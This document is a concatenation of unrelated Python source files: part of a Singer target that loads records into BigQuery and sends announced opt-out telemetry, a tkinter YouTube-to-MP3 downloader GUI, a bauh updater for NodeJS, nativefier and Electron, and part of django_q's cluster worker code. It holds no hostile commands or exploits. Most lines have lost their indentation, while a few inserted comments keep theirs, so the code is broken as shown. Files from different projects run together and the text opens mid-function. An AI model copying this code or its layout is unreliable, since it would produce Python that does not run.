dat = bytes(json.dumps(msg.record) + '\n', 'UTF-8')
rows[msg.stream].write(dat)
#rows[msg.stream].write(bytes(str(msg.record) + '\n', 'UTF-8'))
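            # For illustration (hypothetical record, not from a real stream):
            # a RecordMessage with record {"id": 1, "name": "a"} is buffered as
            # the bytes b'{"id": 1, "name": "a"}\n', one JSON document per line,
            # which is what the NEWLINE_DELIMITED_JSON load job expects.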
state = None
elif isinstance(msg, singer.StateMessage):
logger.debug('Setting state to {}'.format(msg.value))
state = msg.value
elif isinstance(msg, singer.SchemaMessage):
table = msg.stream
schemas[table] = msg.schema
key_properties[table] = msg.key_properties
#tables[table] = bigquery.Table(dataset.table(table), schema=build_schema(schemas[table]))
rows[table] = TemporaryFile(mode='w+b')
errors[table] = None
# try:
# tables[table] = bigquery_client.create_table(tables[table])
# except exceptions.Conflict:
# pass
elif isinstance(msg, singer.ActivateVersionMessage):
# This is experimental and won't be used yet
pass
else:
raise Exception("Unrecognized message {}".format(msg))
for table in rows.keys():
table_ref = bigquery_client.dataset(dataset_id).table(table)
SCHEMA = build_schema(schemas[table])
load_config = LoadJobConfig()
load_config.schema = SCHEMA
load_config.source_format = SourceFormat.NEWLINE_DELIMITED_JSON
if truncate:
load_config.write_disposition = WriteDisposition.WRITE_TRUNCATE
rows[table].seek(0)
logger.info("loading {} to Bigquery.\n".format(table))
load_job = bigquery_client.load_table_from_file(
rows[table], table_ref, job_config=load_config)
logger.info("loading job {}".format(load_job.job_id))
logger.info(load_job.result())
# for table in errors.keys():
# if not errors[table]:
# print('Loaded {} row(s) into {}:{}'.format(rows[table], dataset_id, table), tables[table].path)
# else:
# print('Errors:', errors[table], sep=" ")
return state
def persist_lines_stream(project_id, dataset_id, lines=None, validate_records=True):
state = None
schemas = {}
key_properties = {}
tables = {}
rows = {}
errors = {}
bigquery_client = bigquery.Client(project=project_id)
dataset_ref = bigquery_client.dataset(dataset_id)
dataset = Dataset(dataset_ref)
try:
dataset = bigquery_client.create_dataset(Dataset(dataset_ref)) or Dataset(dataset_ref)
except exceptions.Conflict:
pass
for line in lines:
try:
msg = singer.parse_message(line)
except json.decoder.JSONDecodeError:
logger.error("Unable to parse:\n{}".format(line))
raise
if isinstance(msg, singer.RecordMessage):
if msg.stream not in schemas:
raise Exception("A record for stream {} was encountered before a corresponding schema".format(msg.stream))
schema = schemas[msg.stream]
if validate_records:
validate(msg.record, schema)
errors[msg.stream] = bigquery_client.insert_rows_json(tables[msg.stream], [msg.record])
rows[msg.stream] += 1
state = None
elif isinstance(msg, singer.StateMessage):
logger.debug('Setting state to {}'.format(msg.value))
state = msg.value
elif isinstance(msg, singer.SchemaMessage):
table = msg.stream
schemas[table] = msg.schema
key_properties[table] = msg.key_properties
tables[table] = bigquery.Table(dataset.table(table), schema=build_schema(schemas[table]))
rows[table] = 0
errors[table] = None
try:
tables[table] = bigquery_client.create_table(tables[table])
except exceptions.Conflict:
pass
elif isinstance(msg, singer.ActivateVersionMessage):
# This is experimental and won't be used yet
pass
else:
raise Exception("Unrecognized message {}".format(msg))
    for table in errors.keys():
        if not errors[table]:
            logger.info('Loaded {} row(s) into {}:{}'.format(rows[table], dataset_id, table))
            emit_state(state)
        else:
            logger.error('Errors: {}'.format(errors[table]))
return state
def collect():
try:
version = pkg_resources.get_distribution('target-bigquery').version
conn = http.client.HTTPConnection('collector.singer.io', timeout=10)
conn.connect()
params = {
'e': 'se',
'aid': 'singer',
'se_ca': 'target-bigquery',
'se_ac': 'open',
'se_la': version,
}
conn.request('GET', '/i?' + urllib.parse.urlencode(params))
conn.getresponse()
conn.close()
    except Exception:
        logger.debug('Collection request failed')
def main():
with open(flags.config) as input:
config = json.load(input)
if not config.get('disable_collection', False):
logger.info('Sending version information to stitchdata.com. ' +
'To disable sending anonymous usage data, set ' +
'the config parameter "disable_collection" to true')
threading.Thread(target=collect).start()
if config.get('replication_method') == 'FULL_TABLE':
truncate = True
else:
truncate = False
validate_records = config.get('validate_records', True)
input = io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8')
if config.get('stream_data', True):
state = persist_lines_stream(config['project_id'], config['dataset_id'], input, validate_records=validate_records)
else:
state = persist_lines_job(config['project_id'], config['dataset_id'], input, truncate=truncate, validate_records=validate_records)
emit_state(state)
logger.debug("Exiting normally")
if __name__ == '__main__':
main()
|
app.py
|
import os, sys
from soundspider import SoundSpider
from time import sleep
import threading
import tkinter as tk
the_menu = False
class Application(tk.Frame):
def __init__(self, master=None):
super().__init__(master)
self.master = master
self.pack()
self.create_widgets()
    def destroy(self):
        try:
            # Best-effort: give a running download thread a moment to wrap up.
            self.download_thread.join(timeout=0.1)
        except (AttributeError, RuntimeError):
            pass
        super().destroy()
def create_widgets(self):
self.label_title = tk.Label(self,text="Download Youtube Urls to MP3.\nYou can also download playlists!")
self.label_title.pack(side="top")
self.downloadBtn = tk.Button(self,text="Download",command=self.onToggleDownload)
self.downloadBtn.pack(side="bottom")
self.url_label = tk.Label(self,text="Enter Youtube URL:")
self.url_label.pack(side="top")
self.url_entry = tk.Entry(self)
self.url_entry.pack(side="top")
self.dir_label = tk.Label(self,text="Enter download subfolder:")
self.dir_label.pack(side="top")
self.dir_entry = tk.Entry(self)
self.dir_entry.pack(side="top")
self.status_label = tk.Label(self,text="")
self.status_label.pack(side="bottom")
self.url_entry.bind_class("Entry", "<Button-3><ButtonRelease-3>", self.show_menu)
self.dir_entry.bind_class("Entry", "<Button-3><ButtonRelease-3>", self.show_menu)
def onToggleDownload(self):
status = "Downloading..."
self.status_label['text'] = status
self.downloadBtn['state'] = "disabled"
self.dir_entry['state'] = "disabled"
self.url_entry['state'] = "disabled"
## verbose?
# verbose = True
verbose = False
params = (self.url_entry,self.dir_entry,verbose, self.status_label, self.downloadBtn,self.url_entry,self.dir_entry,True)
        self.download_thread = threading.Thread(target=SoundSpider.convert, args=params)
        self.download_thread.start()
return
def make_menu(self,w):
global the_menu
the_menu = tk.Menu(w, tearoff=0)
the_menu.add_command(label="Cut")
the_menu.add_command(label="Copy")
the_menu.add_command(label="Paste")
def show_menu(self,e):
w = e.widget
the_menu.entryconfigure("Cut",
command=lambda: w.event_generate("<<Cut>>"))
the_menu.entryconfigure("Copy",
command=lambda: w.event_generate("<<Copy>>"))
the_menu.entryconfigure("Paste",
command=lambda: w.event_generate("<<Paste>>"))
the_menu.tk.call("tk_popup", the_menu, e.x_root, e.y_root)
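# The two Entry widgets above share one right-click menu: make_menu() builds it
# once, and show_menu() re-points Cut/Copy/Paste at whichever widget was
# clicked by regenerating the virtual <<Cut>>/<<Copy>>/<<Paste>> events on it.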
root = tk.Tk()
app = Application(master=root)
app.make_menu(root)
app.master.title("RUFO MP3 FETCHER")
app.master.maxsize(400, 200)
app.master.geometry("400x200")
app.mainloop()
|
environment.py
|
import glob
import logging
import os
import shutil
import tarfile
import traceback
from datetime import datetime, timedelta
from pathlib import Path
from threading import Thread
from typing import Dict, List, Optional
import requests
import yaml
from bauh.api.abstract.download import FileDownloader
from bauh.api.abstract.handler import ProcessWatcher, TaskManager
from bauh.api.abstract.view import MessageType
from bauh.api.http import HttpClient
from bauh.commons import system
from bauh.commons.html import bold
from bauh.commons.system import SimpleProcess, ProcessHandler
from bauh.gems.web import ENV_PATH, NODE_DIR_PATH, NODE_BIN_PATH, NODE_MODULES_PATH, NATIVEFIER_BIN_PATH, \
ELECTRON_CACHE_DIR, URL_ENVIRONMENT_SETTINGS, NPM_BIN_PATH, NODE_PATHS, \
nativefier, ENVIRONMENT_SETTINGS_CACHED_FILE, ENVIRONMENT_SETTINGS_TS_FILE, get_icon_path
from bauh.gems.web.model import WebApplication
from bauh.view.util.translation import I18n
class EnvironmentComponent:
def __init__(self, id: str, name: str, size: str, version: str, url: str, update: bool = False, properties: Optional[dict] = None):
self.id = id
self.name = name
self.size = size
self.version = version
self.url = url
self.update = update
self.properties = properties
class EnvironmentUpdater:
def __init__(self, logger: logging.Logger, http_client: HttpClient, file_downloader: FileDownloader, i18n: I18n, taskman: Optional[TaskManager] = None):
self.logger = logger
self.file_downloader = file_downloader
self.i18n = i18n
self.http_client = http_client
self.task_read_settings_id = 'web_read_settings'
self.taskman = taskman
def _install_nodejs(self, version: str, version_url: str, watcher: ProcessWatcher) -> bool:
self.logger.info(f"Downloading NodeJS {version}: {version_url}")
tarf_path = f"{ENV_PATH}/{version_url.split('/')[-1]}"
downloaded = self.file_downloader.download(version_url, watcher=watcher, output_path=tarf_path, cwd=ENV_PATH)
if not downloaded:
self.logger.error(f"Could not download '{version_url}'. Aborting...")
return False
else:
try:
tf = tarfile.open(tarf_path)
tf.extractall(path=ENV_PATH)
extracted_file = f'{ENV_PATH}/{tf.getnames()[0]}'
if os.path.exists(NODE_DIR_PATH):
self.logger.info(f"Removing old NodeJS version installation dir -> {NODE_DIR_PATH}")
try:
shutil.rmtree(NODE_DIR_PATH)
except:
self.logger.error(f"Could not delete old NodeJS version dir -> {NODE_DIR_PATH}")
traceback.print_exc()
return False
try:
os.rename(extracted_file, NODE_DIR_PATH)
except:
self.logger.error(f"Could not rename the NodeJS version file {extracted_file} as {NODE_DIR_PATH}")
traceback.print_exc()
return False
if os.path.exists(NODE_MODULES_PATH):
self.logger.info(f'Deleting {NODE_MODULES_PATH}')
try:
shutil.rmtree(NODE_MODULES_PATH)
except:
self.logger.error(f"Could not delete the directory {NODE_MODULES_PATH}")
return False
return True
except:
self.logger.error(f'Could not extract {tarf_path}')
traceback.print_exc()
return False
finally:
if os.path.exists(tarf_path):
try:
os.remove(tarf_path)
except:
self.logger.error(f'Could not delete file {tarf_path}')
def check_node_installed(self, version: str) -> bool:
if not os.path.exists(NODE_DIR_PATH):
return False
else:
installed_version = system.run_cmd(f'{NODE_BIN_PATH} --version', print_error=False)
if installed_version:
installed_version = installed_version.strip()
if installed_version.startswith('v'):
installed_version = installed_version[1:]
self.logger.info(f'Node versions: installed ({installed_version}), cloud ({version})')
if version != installed_version:
self.logger.info("The NodeJs installed version is different from the Cloud.")
return False
else:
self.logger.info("Node is already up to date")
return True
else:
self.logger.warning("Could not determine the current NodeJS installed version")
return False
def update_node(self, version: str, version_url: str, watcher: ProcessWatcher = None) -> bool:
Path(ENV_PATH).mkdir(parents=True, exist_ok=True)
if not os.path.exists(NODE_DIR_PATH):
return self._install_nodejs(version=version, version_url=version_url, watcher=watcher)
else:
installed_version = system.run_cmd('{} --version'.format(NODE_BIN_PATH), print_error=False)
if installed_version:
installed_version = installed_version.strip()
if installed_version.startswith('v'):
installed_version = installed_version[1:]
self.logger.info(f'Node versions: installed ({installed_version}), cloud ({version})')
if version != installed_version:
self.logger.info("The NodeJs installed version is different from the Cloud.")
return self._install_nodejs(version=version, version_url=version_url, watcher=watcher)
else:
self.logger.info("Node is already up to date")
return True
else:
self.logger.warning("Could not determine the current NodeJS installed version")
self.logger.info(f"Removing {NODE_DIR_PATH}")
try:
shutil.rmtree(NODE_DIR_PATH)
return self._install_nodejs(version=version, version_url=version_url, watcher=watcher)
except:
self.logger.error(f'Could not delete the dir {NODE_DIR_PATH}')
return False
def _install_node_lib(self, name: str, version: str, handler: ProcessHandler):
lib_repr = f"{name}{'@{}'.format(version) if version else ''}"
self.logger.info(f"Installing {lib_repr}")
if handler and handler.watcher:
handler.watcher.change_substatus(self.i18n['web.environment.install'].format(bold(lib_repr)))
proc = SimpleProcess([NPM_BIN_PATH, 'install', lib_repr], cwd=ENV_PATH, extra_paths=NODE_PATHS)
installed = handler.handle_simple(proc)[0]
if installed:
self.logger.info(f"{lib_repr} successfully installed")
return installed
def _install_nativefier(self, version: str, url: str, handler: ProcessHandler) -> bool:
self.logger.info(f"Checking if nativefier@{version} exists")
if not url or not self.http_client.exists(url):
self.logger.warning(f"The file {url} seems not to exist")
handler.watcher.show_message(title=self.i18n['message.file.not_exist'],
body=self.i18n['message.file.not_exist.body'].format(bold(url)),
type_=MessageType.ERROR)
return False
        success = self._install_node_lib('nativefier', version, handler)
        if success:
            return self._is_nativefier_installed()
        return False
def _is_nativefier_installed(self) -> bool:
return os.path.exists(NATIVEFIER_BIN_PATH)
def _get_electron_url(self, version: str, base_url: str, is_x86_x64_arch: bool) -> str:
return base_url.format(version=version, arch='x64' if is_x86_x64_arch else 'ia32')
def check_electron_installed(self, version: str, base_url: str, is_x86_x64_arch: bool, widevine: bool) -> Dict[str, bool]:
self.logger.info(f"Checking if Electron {version} (widevine={widevine}) is installed")
res = {'electron': False, 'sha256': False}
if not os.path.exists(ELECTRON_CACHE_DIR):
self.logger.info(f"Electron cache directory {ELECTRON_CACHE_DIR} not found")
else:
files = {os.path.basename(f) for f in glob.glob(f'{ELECTRON_CACHE_DIR}/**', recursive=True) if os.path.isfile(f)}
if files:
electron_url = self._get_electron_url(version=version, base_url=base_url, is_x86_x64_arch=is_x86_x64_arch)
res['electron'] = os.path.basename(electron_url) in files
res['sha256'] = res['electron']
else:
self.logger.info(f"No Electron file found in '{ELECTRON_CACHE_DIR}'")
for att in ('electron', 'sha256'):
if res[att]:
self.logger.info(f'{att} ({version}) already downloaded')
return res
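    # For example (hypothetical values, assuming the usual Electron release
    # naming behind electron_settings['url']): for version 9.4.4 on x86_64 this
    # method only checks whether a file whose basename matches the resolved
    # download URL (e.g. electron-v9.4.4-linux-x64.zip) is already present
    # anywhere under ELECTRON_CACHE_DIR; the sha256 flag simply mirrors that
    # result here, since no checksum file is looked up separately.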
def _finish_task_download_settings(self):
if self.taskman:
self.taskman.update_progress(self.task_read_settings_id, 100, None)
self.taskman.finish_task(self.task_read_settings_id)
def should_download_settings(self, web_config: dict) -> bool:
try:
settings_exp = int(web_config['environment']['cache_exp'])
except ValueError:
self.logger.error(f"Could not parse settings property 'environment.cache_exp': {web_config['environment']['cache_exp']}")
return True
if settings_exp <= 0:
self.logger.info("No expiration time configured for the environment settings cache file.")
return True
self.logger.info("Checking cached environment settings file")
if not os.path.exists(ENVIRONMENT_SETTINGS_CACHED_FILE):
self.logger.warning("Environment settings file not cached.")
return True
if not os.path.exists(ENVIRONMENT_SETTINGS_TS_FILE):
self.logger.warning("Environment settings file has no timestamp associated with it.")
return True
with open(ENVIRONMENT_SETTINGS_TS_FILE) as f:
env_ts_str = f.read()
try:
env_timestamp = datetime.fromtimestamp(float(env_ts_str))
except:
self.logger.error(f"Could not parse environment settings file timestamp: {env_ts_str}")
return True
expired = env_timestamp + timedelta(hours=settings_exp) <= datetime.utcnow()
if expired:
self.logger.info("Environment settings file has expired. It should be re-downloaded")
return True
else:
self.logger.info("Cached environment settings file is up to date")
return False
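    # Worked example (hypothetical numbers): with environment.cache_exp = 24 and
    # a timestamp file written at 2021-01-01T00:00:00 UTC, the cached settings
    # are treated as valid until 2021-01-02T00:00:00 UTC; any call at or after
    # that instant returns True and forces a fresh download.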
def read_cached_settings(self, web_config: dict) -> Optional[dict]:
if not self.should_download_settings(web_config):
with open(ENVIRONMENT_SETTINGS_CACHED_FILE) as f:
cached_settings_str = f.read()
try:
return yaml.safe_load(cached_settings_str)
except yaml.YAMLError:
self.logger.error(f'Could not parse the cache environment settings file: {cached_settings_str}')
def read_settings(self, web_config: dict, cache: bool = True) -> Optional[dict]:
if self.taskman:
self.taskman.register_task(self.task_read_settings_id, self.i18n['web.task.download_settings'], get_icon_path())
self.taskman.update_progress(self.task_read_settings_id, 1, None)
cached_settings = self.read_cached_settings(web_config) if cache else None
if cached_settings:
return cached_settings
try:
if self.taskman:
self.taskman.update_progress(self.task_read_settings_id, 10, None)
self.logger.info("Downloading environment settings")
res = self.http_client.get(URL_ENVIRONMENT_SETTINGS)
if not res:
                self.logger.warning('Could not retrieve the environment settings from the cloud')
self._finish_task_download_settings()
return
try:
settings = yaml.safe_load(res.content)
nodejs_settings = settings.get('nodejs')
if nodejs_settings:
nodejs_settings['url'] = nodejs_settings['url'].format(version=nodejs_settings['version'])
except yaml.YAMLError:
self.logger.error(f'Could not parse environment settings: {res.text}')
self._finish_task_download_settings()
return
self.logger.info("Caching environment settings to disk")
cache_dir = os.path.dirname(ENVIRONMENT_SETTINGS_CACHED_FILE)
try:
Path(cache_dir).mkdir(parents=True, exist_ok=True)
except OSError:
self.logger.error(f"Could not create Web cache directory: {cache_dir}")
self.logger.info('Finished')
self._finish_task_download_settings()
return
cache_timestamp = datetime.utcnow().timestamp()
with open(ENVIRONMENT_SETTINGS_CACHED_FILE, 'w+') as f:
f.write(yaml.safe_dump(settings))
with open(ENVIRONMENT_SETTINGS_TS_FILE, 'w+') as f:
f.write(str(cache_timestamp))
self._finish_task_download_settings()
self.logger.info("Finished")
return settings
except requests.exceptions.ConnectionError:
self._finish_task_download_settings()
return
def _check_and_fill_electron(self, pkg: WebApplication, env: dict, local_config: dict, x86_x64: bool, widevine: bool, output: List[EnvironmentComponent]):
electron_settings = env['electron-wvvmp' if widevine else 'electron']
electron_version = electron_settings['version']
if not widevine and pkg.version and pkg.version != electron_version: # this feature does not support custom widevine electron at the moment
self.logger.info(f'A preset Electron version is defined for {pkg.url}: {pkg.version}')
electron_version = pkg.version
        if not widevine and local_config['environment']['electron']['version']:
            electron_version = local_config['environment']['electron']['version']
            self.logger.warning(f"A custom Electron version ({electron_version}) will be used to install {pkg.url}")
electron_status = self.check_electron_installed(version=electron_version, base_url=electron_settings['url'],
is_x86_x64_arch=x86_x64, widevine=widevine)
electron_url = self._get_electron_url(version=electron_version, base_url=electron_settings['url'], is_x86_x64_arch=x86_x64)
output.append(EnvironmentComponent(name=electron_url.split('/')[-1],
version=electron_version,
url=electron_url,
size=self.http_client.get_content_length(electron_url),
id='electron',
update=not electron_status['electron'],
properties={'widevine': widevine}))
sha_url = electron_settings['sha_url'].format(version=electron_version)
output.append(EnvironmentComponent(name=sha_url.split('/')[-1],
version=electron_version,
url=sha_url,
size=self.http_client.get_content_length(sha_url),
id='electron_sha256',
update=not electron_status['electron'] or not electron_status['sha256'],
properties={'widevine': widevine}))
def _check_and_fill_node(self, env: dict, output: List[EnvironmentComponent]):
node = EnvironmentComponent(name=env['nodejs']['url'].split('/')[-1],
url=env['nodejs']['url'],
size=self.http_client.get_content_length(env['nodejs']['url']),
version=env['nodejs']['version'],
id='nodejs')
output.append(node)
native = self._map_nativefier_file(env['nativefier'])
output.append(native)
if not self.check_node_installed(env['nodejs']['version']):
node.update, native.update = True, True
else:
if not self._check_nativefier_installed(env['nativefier']):
native.update = True
def _check_nativefier_installed(self, nativefier_settings: dict) -> bool:
if not os.path.exists(NODE_MODULES_PATH):
self.logger.info(f'Node modules path {NODE_MODULES_PATH} not found')
return False
else:
if not self._is_nativefier_installed():
return False
installed_version = nativefier.get_version()
if installed_version:
installed_version = installed_version.strip()
self.logger.info(f"Nativefier versions: installed ({installed_version}), cloud ({nativefier_settings['version']})")
if nativefier_settings['version'] != installed_version:
self.logger.info("Installed nativefier version is different from cloud's. Changing version.")
return False
self.logger.info("Nativefier is already installed and up to date")
return True
def _map_nativefier_file(self, nativefier_settings: dict) -> EnvironmentComponent:
url = nativefier_settings['url'].format(version=nativefier_settings['version'])
return EnvironmentComponent(name=f"nativefier@{nativefier_settings['version']}",
url=url,
size=self.http_client.get_content_length(url),
version=nativefier_settings['version'],
id='nativefier')
def check_environment(self, env: dict, local_config: dict, app: WebApplication,
is_x86_x64_arch: bool, widevine: bool) -> List[EnvironmentComponent]:
components, check_threads = [], []
system_env = local_config['environment'].get('system', False)
if system_env:
self.logger.warning(f"Using system's nativefier to install {app.url}")
else:
node_check = Thread(target=self._check_and_fill_node, args=(env, components))
node_check.start()
check_threads.append(node_check)
elec_check = Thread(target=self._check_and_fill_electron, args=(app, env, local_config, is_x86_x64_arch, widevine, components))
elec_check.start()
check_threads.append(elec_check)
for t in check_threads:
t.join()
return components
def update(self, components: List[EnvironmentComponent], handler: ProcessHandler) -> bool:
self.logger.info('Updating environment')
Path(ENV_PATH).mkdir(parents=True, exist_ok=True)
comp_map = {c.id: c for c in components}
node_data = comp_map.get('nodejs')
nativefier_data = comp_map.get('nativefier')
if node_data:
if not self._install_nodejs(version=node_data.version, version_url=node_data.url, watcher=handler.watcher):
return False
if not self._install_nativefier(version=nativefier_data.version, url=nativefier_data.url, handler=handler):
return False
else:
if nativefier_data and not self._install_nativefier(version=nativefier_data.version, url=nativefier_data.url, handler=handler):
return False
self.logger.info('Environment successfully updated')
return True
|
cluster.py
|
# Future
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from time import sleep
# external
import arrow
import ast
# Standard
import importlib
import signal
import socket
import traceback
# Django
from django import db
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from multiprocessing import Event, Process, Value, current_process
# Local
import django_q.tasks
from django_q.brokers import get_broker
from django_q.conf import Conf, logger, psutil, get_ppid, error_reporter
from django_q.models import Task, Success, Schedule
from django_q.queues import Queue
from django_q.signals import pre_execute
from django_q.signing import SignedPackage, BadSignature
from django_q.status import Stat, Status
class Cluster(object):
def __init__(self, broker=None):
self.broker = broker or get_broker()
self.sentinel = None
self.stop_event = None
self.start_event = None
self.pid = current_process().pid
self.host = socket.gethostname()
self.timeout = Conf.TIMEOUT
signal.signal(signal.SIGTERM, self.sig_handler)
signal.signal(signal.SIGINT, self.sig_handler)
def start(self):
# Start Sentinel
self.stop_event = Event()
self.start_event = Event()
self.sentinel = Process(target=Sentinel,
args=(self.stop_event, self.start_event, self.broker, self.timeout))
self.sentinel.start()
logger.info(_('Q Cluster-{} starting.').format(self.pid))
while not self.start_event.is_set():
sleep(0.1)
return self.pid
def stop(self):
if not self.sentinel.is_alive():
return False
logger.info(_('Q Cluster-{} stopping.').format(self.pid))
self.stop_event.set()
self.sentinel.join()
logger.info(_('Q Cluster-{} has stopped.').format(self.pid))
self.start_event = None
self.stop_event = None
return True
def sig_handler(self, signum, frame):
logger.debug(_('{} got signal {}').format(current_process().name,
Conf.SIGNAL_NAMES.get(signum, 'UNKNOWN')))
self.stop()
@property
def stat(self):
if self.sentinel:
return Stat.get(self.pid)
return Status(self.pid)
@property
def is_starting(self):
return self.stop_event and self.start_event and not self.start_event.is_set()
@property
def is_running(self):
return self.stop_event and self.start_event and self.start_event.is_set()
@property
def is_stopping(self):
return self.stop_event and self.start_event and self.start_event.is_set() and self.stop_event.is_set()
@property
def has_stopped(self):
return self.start_event is None and self.stop_event is None and self.sentinel
class Sentinel(object):
def __init__(self, stop_event, start_event, broker=None, timeout=Conf.TIMEOUT, start=True):
# Make sure we catch signals for the pool
signal.signal(signal.SIGINT, signal.SIG_IGN)
signal.signal(signal.SIGTERM, signal.SIG_DFL)
self.pid = current_process().pid
self.parent_pid = get_ppid()
self.name = current_process().name
self.broker = broker or get_broker()
self.reincarnations = 0
self.tob = timezone.now()
self.stop_event = stop_event
self.start_event = start_event
self.pool_size = Conf.WORKERS
self.pool = []
self.timeout = timeout
self.task_queue = Queue(maxsize=Conf.QUEUE_LIMIT) if Conf.QUEUE_LIMIT else Queue()
self.result_queue = Queue()
self.event_out = Event()
self.monitor = None
self.pusher = None
if start:
self.start()
def start(self):
self.broker.ping()
self.spawn_cluster()
self.guard()
def status(self):
if not self.start_event.is_set() and not self.stop_event.is_set():
return Conf.STARTING
elif self.start_event.is_set() and not self.stop_event.is_set():
if self.result_queue.empty() and self.task_queue.empty():
return Conf.IDLE
return Conf.WORKING
elif self.stop_event.is_set() and self.start_event.is_set():
if self.monitor.is_alive() or self.pusher.is_alive() or len(self.pool) > 0:
return Conf.STOPPING
return Conf.STOPPED
def spawn_process(self, target, *args):
"""
:type target: function or class
"""
p = Process(target=target, args=args)
p.daemon = True
if target == worker:
p.daemon = Conf.DAEMONIZE_WORKERS
p.timer = args[2]
self.pool.append(p)
p.start()
return p
def spawn_pusher(self):
return self.spawn_process(pusher, self.task_queue, self.event_out, self.broker)
def spawn_worker(self):
self.spawn_process(worker, self.task_queue, self.result_queue, Value('f', -1), self.timeout)
def spawn_monitor(self):
return self.spawn_process(monitor, self.result_queue, self.broker)
def reincarnate(self, process):
"""
:param process: the process to reincarnate
:type process: Process or None
"""
db.connections.close_all() # Close any old connections
if process == self.monitor:
self.monitor = self.spawn_monitor()
logger.error(_("reincarnated monitor {} after sudden death").format(process.name))
elif process == self.pusher:
self.pusher = self.spawn_pusher()
logger.error(_("reincarnated pusher {} after sudden death").format(process.name))
else:
self.pool.remove(process)
self.spawn_worker()
if process.timer.value == 0:
# only need to terminate on timeout, otherwise we risk destabilizing the queues
process.terminate()
logger.warn(_("reincarnated worker {} after timeout").format(process.name))
elif int(process.timer.value) == -2:
logger.info(_("recycled worker {}").format(process.name))
else:
logger.error(_("reincarnated worker {} after death").format(process.name))
self.reincarnations += 1
def spawn_cluster(self):
self.pool = []
Stat(self).save()
db.connection.close()
# spawn worker pool
for __ in range(self.pool_size):
self.spawn_worker()
# spawn auxiliary
self.monitor = self.spawn_monitor()
self.pusher = self.spawn_pusher()
# set worker cpu affinity if needed
if psutil and Conf.CPU_AFFINITY:
set_cpu_affinity(Conf.CPU_AFFINITY, [w.pid for w in self.pool])
def guard(self):
logger.info(_('{} guarding cluster at {}').format(current_process().name, self.pid))
self.start_event.set()
Stat(self).save()
logger.info(_('Q Cluster-{} running.').format(self.parent_pid))
counter = 0
cycle = Conf.GUARD_CYCLE # guard loop sleep in seconds
# Guard loop. Runs at least once
while not self.stop_event.is_set() or not counter:
# Check Workers
for p in self.pool:
with p.timer.get_lock():
# Are you alive?
if not p.is_alive() or p.timer.value == 0:
self.reincarnate(p)
continue
# Decrement timer if work is being done
if p.timer.value > 0:
p.timer.value -= cycle
# Check Monitor
if not self.monitor.is_alive():
self.reincarnate(self.monitor)
# Check Pusher
if not self.pusher.is_alive():
self.reincarnate(self.pusher)
# Call scheduler once a minute (or so)
counter += cycle
if counter >= 30 and Conf.SCHEDULER:
counter = 0
scheduler(broker=self.broker)
# Save current status
Stat(self).save()
sleep(cycle)
self.stop()
def stop(self):
Stat(self).save()
name = current_process().name
logger.info(_('{} stopping cluster processes').format(name))
# Stopping pusher
self.event_out.set()
# Wait for it to stop
while self.pusher.is_alive():
sleep(0.1)
Stat(self).save()
# Put poison pills in the queue
for __ in range(len(self.pool)):
self.task_queue.put('STOP')
self.task_queue.close()
# wait for the task queue to empty
self.task_queue.join_thread()
# Wait for all the workers to exit
while len(self.pool):
for p in self.pool:
if not p.is_alive():
self.pool.remove(p)
sleep(0.1)
Stat(self).save()
# Finally stop the monitor
self.result_queue.put('STOP')
self.result_queue.close()
# Wait for the result queue to empty
self.result_queue.join_thread()
logger.info(_('{} waiting for the monitor.').format(name))
# Wait for everything to close or time out
count = 0
if not self.timeout:
self.timeout = 30
while self.status() == Conf.STOPPING and count < self.timeout * 10:
sleep(0.1)
Stat(self).save()
count += 1
# Final status
Stat(self).save()
def pusher(task_queue, event, broker=None):
"""
    Pulls tasks off the broker and puts them in the task queue
:type task_queue: multiprocessing.Queue
:type event: multiprocessing.Event
"""
if not broker:
broker = get_broker()
logger.info(_('{} pushing tasks at {}').format(current_process().name, current_process().pid))
while True:
try:
task_set = broker.dequeue()
except Exception as e:
logger.error(e, traceback.format_exc())
# broker probably crashed. Let the sentinel handle it.
sleep(10)
break
if task_set:
for task in task_set:
ack_id = task[0]
# unpack the task
try:
task = SignedPackage.loads(task[1])
except (TypeError, BadSignature) as e:
logger.error(e, traceback.format_exc())
broker.fail(ack_id)
continue
task['ack_id'] = ack_id
task_queue.put(task)
logger.debug(_('queueing from {}').format(broker.list_key))
if event.is_set():
break
logger.info(_("{} stopped pushing tasks").format(current_process().name))
def monitor(result_queue, broker=None):
"""
Gets finished tasks from the result queue and saves them to Django
:type result_queue: multiprocessing.Queue
"""
if not broker:
broker = get_broker()
name = current_process().name
logger.info(_("{} monitoring at {}").format(name, current_process().pid))
for task in iter(result_queue.get, 'STOP'):
# save the result
if task.get('cached', False):
save_cached(task, broker)
else:
save_task(task, broker)
# acknowledge result
ack_id = task.pop('ack_id', False)
if ack_id and (task['success'] or task.get('ack_failure', False)):
broker.acknowledge(ack_id)
# log the result
if task['success']:
# log success
logger.info(_("Processed [{}]").format(task['name']))
else:
# log failure
logger.error(_("Failed [{}] - {}").format(task['name'], task['result']))
logger.info(_("{} stopped monitoring results").format(name))
def worker(task_queue, result_queue, timer, timeout=Conf.TIMEOUT):
"""
Takes a task from the task queue, tries to execute it and puts the result back in the result queue
:type task_queue: multiprocessing.Queue
:type result_queue: multiprocessing.Queue
:type timer: multiprocessing.Value
"""
name = current_process().name
logger.info(_('{} ready for work at {}').format(name, current_process().pid))
task_count = 0
if timeout is None:
timeout = -1
# Start reading the task queue
for task in iter(task_queue.get, 'STOP'):
result = None
timer.value = -1 # Idle
task_count += 1
# Get the function from the task
logger.info(_('{} processing [{}]').format(name, task['name']))
f = task['func']
# if it's not an instance try to get it from the string
if not callable(task['func']):
try:
module, func = f.rsplit('.', 1)
m = importlib.import_module(module)
f = getattr(m, func)
except (ValueError, ImportError, AttributeError) as e:
result = (e, False)
if error_reporter:
error_reporter.report()
# We're still going
if not result:
db.close_old_connections()
timer_value = task['kwargs'].pop('timeout', timeout)
# signal execution
pre_execute.send(sender="django_q", func=f, task=task)
# execute the payload
timer.value = timer_value # Busy
try:
res = f(*task['args'], **task['kwargs'])
result = (res, True)
except Exception as e:
result = ('{} : {}'.format(e, traceback.format_exc()), False)
if error_reporter:
error_reporter.report()
with timer.get_lock():
# Process result
task['result'] = result[0]
task['success'] = result[1]
task['stopped'] = timezone.now()
result_queue.put(task)
timer.value = -1 # Idle
# Recycle
if task_count == Conf.RECYCLE:
timer.value = -2 # Recycled
break
logger.info(_('{} stopped doing work').format(name))
def save_task(task, broker):
"""
Saves the task package to Django or the cache
"""
# SAVE LIMIT < 0 : Don't save success
